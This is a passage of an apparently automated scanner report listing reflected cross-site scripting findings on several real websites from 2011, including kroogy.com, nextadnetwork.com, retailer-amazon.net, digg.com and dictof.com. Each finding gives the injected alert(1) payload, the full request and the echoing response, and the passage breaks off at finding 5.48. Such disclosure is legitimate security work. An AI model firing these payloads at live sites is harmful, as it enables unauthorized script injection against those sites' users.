   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>redir24b8a<img src=a onerror=alert(1)>a30ab8d9c04aed8ef</strong>
...[SNIP]...

5.34. http://kroogy.com/search/special [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/special

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 34153<img%20src%3da%20onerror%3dalert(1)>b5d3aca645c was submitted in the REST URL parameter 1. This input was echoed as 34153<img src=a onerror=alert(1)>b5d3aca645c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search34153<img%20src%3da%20onerror%3dalert(1)>b5d3aca645c/special?search=site%3Axss.cx&type=sports&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search34153<img src=a onerror=alert(1)>b5d3aca645cController</strong>
...[SNIP]...

5.35. http://kroogy.com/search/special [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/special

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae757<img%20src%3da%20onerror%3dalert(1)>d4b0d95427 was submitted in the REST URL parameter 2. This input was echoed as ae757<img src=a onerror=alert(1)>d4b0d95427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/specialae757<img%20src%3da%20onerror%3dalert(1)>d4b0d95427?search=site%3Axss.cx&type=sports&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2120

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>specialae757<img src=a onerror=alert(1)>d4b0d95427</strong>
...[SNIP]...

5.36. http://kroogy.com/search/videos [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/videos

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf3e5<img%20src%3da%20onerror%3dalert(1)>e2f2d6523e1 was submitted in the REST URL parameter 1. This input was echoed as bf3e5<img src=a onerror=alert(1)>e2f2d6523e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchbf3e5<img%20src%3da%20onerror%3dalert(1)>e2f2d6523e1/videos?search=site%3Axss.cx&type=videos&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.10.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:46:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchbf3e5<img src=a onerror=alert(1)>e2f2d6523e1Controller</strong>
...[SNIP]...

5.37. http://kroogy.com/search/videos [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/videos

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b764<img%20src%3da%20onerror%3dalert(1)>cca99ab0549 was submitted in the REST URL parameter 2. This input was echoed as 9b764<img src=a onerror=alert(1)>cca99ab0549 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos9b764<img%20src%3da%20onerror%3dalert(1)>cca99ab0549?search=site%3Axss.cx&type=videos&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.10.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:46:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2120

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>videos9b764<img src=a onerror=alert(1)>cca99ab0549</strong>
...[SNIP]...

5.38. http://kroogy.com/search/web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aae05<img%20src%3da%20onerror%3dalert(1)>78d7029f299 was submitted in the REST URL parameter 1. This input was echoed as aae05<img src=a onerror=alert(1)>78d7029f299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchaae05<img%20src%3da%20onerror%3dalert(1)>78d7029f299/web?search=site%3Axss.cx&type=web&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:39:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchaae05<img src=a onerror=alert(1)>78d7029f299Controller</strong>
...[SNIP]...

5.39. http://kroogy.com/search/web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 15d5b<img%20src%3da%20onerror%3dalert(1)>f149c7a1f7f was submitted in the REST URL parameter 2. This input was echoed as 15d5b<img src=a onerror=alert(1)>f149c7a1f7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web15d5b<img%20src%3da%20onerror%3dalert(1)>f149c7a1f7f?search=site%3Axss.cx&type=web&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:39:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>web15d5b<img src=a onerror=alert(1)>f149c7a1f7f</strong>
...[SNIP]...

5.40. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c3ca</script><script>alert(1)</script>8a921d8d37a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /z/371/CD1/id4+1061634715c3ca</script><script>alert(1)</script>8a921d8d37a HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:24:10 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=5932ae843e7b4a5cd3e96139679c6367; expires=Mon, 25-Apr-2011 03:24:10 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=5932ae843e7b4a5cd3e96139679c6367; expires=Tue, 24-May-2011 03:24:10 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=5932ae843e7b4a5cd3e96139679c6367; expires=Tue, 24-May-2011 03:24:10 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb146
Content-Length: 577
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 1061634715c3ca</script><script>alert(1)</script>8a921d8d37aCD1&c2=CD1">
<script type="text/javascript">function redirect() {if(document.cookie == ''){location.href="http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 1061634715c3ca</script><script>alert(1)</script>8a921d8d37aCD1&c2=CD1";}}</script>
...[SNIP]...

5.41. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e01"><script>alert(1)</script>0f82d394dbd was submitted in the REST URL parameter 4. This input was echoed as a2e01\"><script>alert(1)</script>0f82d394dbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /z/371/CD1/id4+106163471a2e01"><script>alert(1)</script>0f82d394dbd HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:24:05 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=94a53209cc67f8af3f6833eb0646d02a; expires=Mon, 25-Apr-2011 03:24:05 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=94a53209cc67f8af3f6833eb0646d02a; expires=Tue, 24-May-2011 03:24:05 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=94a53209cc67f8af3f6833eb0646d02a; expires=Tue, 24-May-2011 03:24:05 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb130
Content-Length: 565
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 106163471a2e01\"><script>alert(1)</script>0f82d394dbdCD1&c2=CD1">
<script type="
...[SNIP]...

5.42. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96112"><img%20src%3da%20onerror%3dalert(1)>e97eff3a4a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96112"><img src=a onerror=alert(1)>e97eff3a4a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_120_600_a.php?search={$keyw/96112"><img%20src%3da%20onerror%3dalert(1)>e97eff3a4a8ord} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 620


<html>
<head>
<title> {$keyw96112"><img src=a onerror=alert(1)>e97eff3a4a8ord} </title>
<meta name="description" content="{$keyw96112"><img src=a onerror=alert(1)>e97eff3a4a8ord}">
<meta name="keywor
...[SNIP]...
<iframe name="I1" src="banner_120_600_b.php?search={$keyw96112"><img src=a onerror=alert(1)>e97eff3a4a8ord}" marginwidth="1" marginheight="1" height="600" width="160" scrolling="no" border="0" frameborder="0">
...[SNIP]...

5.43. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d4b"><img%20src%3da%20onerror%3dalert(1)>1a348cd60ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a6d4b"><img src=a onerror=alert(1)>1a348cd60ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_120_600_a.php?search={$keyw/a6d4b"><img%20src%3da%20onerror%3dalert(1)>1a348cd60acord} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 620


<html>
<head>
<title> {$keywa6d4b"><img src=a onerror=alert(1)>1a348cd60acord} </title>
<meta name="description" content="{$keywa6d4b"><img src=a onerror=alert(1)>1a348cd60acord}">
<meta name="keywor
...[SNIP]...

5.44. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fc5"><img%20src%3da%20onerror%3dalert(1)>575b178e83c was submitted in the search parameter. This input was echoed as 29fc5"><img src=a onerror=alert(1)>575b178e83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_120_600_a.php?search={$keyword}29fc5"><img%20src%3da%20onerror%3dalert(1)>575b178e83c HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 620


<html>
<head>
<title> {$keyword}29fc5"><img src=a onerror=alert(1)>575b178e83c </title>
<meta name="description" content="{$keyword}29fc5"><img src=a onerror=alert(1)>575b178e83c">
<meta name="keywor
...[SNIP]...

5.45. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44577"><img%20src%3da%20onerror%3dalert(1)>4b902301784 was submitted in the search parameter. This input was echoed as 44577"><img src=a onerror=alert(1)>4b902301784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_120_600_a.php?search=44577"><img%20src%3da%20onerror%3dalert(1)>4b902301784 HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 580


<html>
<head>
<title> 44577"><img src=a onerror=alert(1)>4b902301784 </title>
<meta name="description" content="44577"><img src=a onerror=alert(1)>4b902301784">
<meta name="keywords" content="44577">
...[SNIP]...
<iframe name="I1" src="banner_120_600_b.php?search=44577"><img src=a onerror=alert(1)>4b902301784" marginwidth="1" marginheight="1" height="600" width="160" scrolling="no" border="0" frameborder="0">
...[SNIP]...

5.46. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload e685f<script>alert(1)</script>8d158132c29 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.htmle685f<script>alert(1)</script>8d158132c29 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 24 Apr 2011 04:06:47 GMT
Via: NS-CACHE: 100
Etag: "9132285711f22c48b2e96cbecb65472c685386d9"
Content-Length: 213
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 24 Apr 2011 04:16:46 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.htmle685f<script>alert(1)</script>8d158132c29", "diggs": 0});

5.47. http://www.dictof.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe6d1<script>alert(1)</script>99e6fce44cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icofe6d1<script>alert(1)</script>99e6fce44cd HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FC101987E2340D1CA7E9F5BBE7019BA1.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; CAMPAIGNE.ENTRY_DATE_COOKIE=1303648014948; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=121015709.328301938.1303648022.1303648022.1303648022.1; __utmc=121015709; __utmb=121015709.1.10.1303648022; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=262432266.188043035.1303648022.1303648022.1303648022.1; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.2.10.1303648022

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 24 Apr 2011 12:45:23 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: lc=en; Path=/
Content-Language: en
Content-Length: 3651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<p>The page - /favicon.icofe6d1<script>alert(1)</script>99e6fce44cd - does not exist.</p>
...[SNIP]...

5.48. http://www.lifelock.com/offers/faces/female/ [promocodehide parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /offers/faces/female/

Issue detail

